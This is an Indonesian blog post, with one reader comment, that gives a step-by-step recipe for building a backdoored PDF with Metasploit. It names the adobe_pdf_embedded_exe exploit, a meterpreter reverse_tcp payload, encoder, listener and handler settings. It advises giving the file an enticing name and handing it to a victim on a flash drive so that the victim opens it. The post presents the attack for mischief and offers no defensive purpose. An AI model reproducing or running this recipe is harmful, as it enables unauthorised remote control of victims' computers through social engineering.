Friday 21 October 2016

Metasploit Hacking Dengan Backdoor PDF






Hay Gaesss kali ini saya akan memberi kalian sedikit info tentang bagaimana cara hacking atau membuat trojan dengan menggunakan Framework yang terdapat pada Sistem Operasi Kali Linux. Nah disini saya menggunakan PDF sebagai Backdoor.

Trojan horse atau Kuda Troya atau yang lebih dikenal sebagai Trojan sendiri merupakan keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan.

Nah tujuan belajar Metasploit Hacking dengan Backdoor PDF adalah agar kalian dapat memunculkan modul, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya walaupun penyusup sistem berada pada jarak jangkauan yang jauh tetapi dapat mengendalikan komputer target.

Metasploit menyerang dengan cara mengirimkan exploit yang berisi payload yang sudah ditentukan oleh penyusup sistem pada komputer target.

Exploit merupakan software yang berfungsi untuk memanfaatkan kelemahan pada software target(misal web browser), setelah berhasil mengeksploitasinya exploit tersebut memasukkan payload ke dalam memori korban.

Payload merupakan sebuah file executable milik penyusup yang akan di run pada komputer target dengan tujuan dapat mengendalikan komputer tersebut secara remote atau memasang backdoor, trojan, virus, worm, dan lain-lain.

Ok, langsung saja ya.. yang perlu kalian siapkan adalah sebagai berikut:
-  Kali Linux 1.09a (disini saya menggukan Virtual untuk menjalankan Kali Linux 1.09a)
- Adobe Reader 9.0
- Jaringan Internet(pastikan Target dalam satu jaringan)
- Metasploit Framework: Exploit: windows/fileformat/adobe_pdf_embedded_exe dan exploit/multi/handler. Payload: windows/meterpreter/reverse_tcp

Langkah-langkahnya sebagai berikut:

1. Cek Konfigurasi Jaringan

2. Menyiapkan Console msf Metasploit
Ketikkan perintah msfconsole pada terminal dan tampilan metasploitnya seperti gambar dibawah ini. oya biasanya tampilan setiap menjalankan Metasploit akan berubah-ubah.

3. Modul Exploitasi.

Keterangan:
- use windows/fileformat/adobe_pdf_embedded_exe: Tipe Exploit yang digunakan.
- set msfencode x86/shikata_ga_nai: Command untuk meng-encode payload dan keluarnya di/tmp/clickname.exe
- set payload windows/meterpreter/reverse_tcp:  Mengatur payload yang digunakan kesebuah target ketika shell sudah terpasang.
- set lhost: IP Attacker, isi sesuai dengan IP anda.
- set lport: Port listener, saya menggunakan port 445 karena selalu terbuka.
- set filename: Nama file Backdoor, menggunakan nama semenarik mungkin agar target penasaran dan membukanya.
- set infilename: Merupakan file asli PDFnya, dan harus dimasukkan sesuai dengan path atau lokasi dimana file itu berada.
- exploit: Perintah untuk menghasilkan file PDF(backdoor)


4. Mengirimkan File Backdoor yang telah dibuat.
Disini saya menggunakan flashdisk untuk menjebak target dengan cara seolah-olah mengirim file yang dibutuhkan.


5. Modul Exploitasi Lanjutan(handler/listerner)
Proses diatas merupakan perintah menjalankan multi/handler untuk memastikan target terkena jebakan yang telah kita buat.

6. Hasil menjalankan (handler/listerner)

Bingooo!!! Prosesnya cepat, pada komputer target akan muncul box command prompt dalam waktu sekitar 1 detik. Dan kalau sudah muncul console meterpreter selanjutnya terserah kalian mau diapakan. Oya selanjutnya ketik perintah help , didalamnya tersedia command untuk melakukan apa saja yang bisa digunakan pada Desktop siTarget.

Mungkin itu saja yang dapat saya informasikan semoga bermanfaat buat Kakak-kakak semua yang memeliliki kejahilan tinggi hehehe... Terma kasih.

Sumber:
- http://fullstop.solutions/wp-content/uploads/2014/04/trojan.jpg
- https://www.kali.org/wp-content/uploads/2015/02/kali-wallpaper-2015-v1.1.0.png
- http://lycee-douai-biotech.fr/images/pdf-icon.png
- https://blacknetlinux.wordpress.com/2012/10/09/apa-itu-metasploit/

2 comments:

  1. Kok saya gagal ya bang?

    Handler failed to bind to 192.168.1.7:8080

    ReplyDelete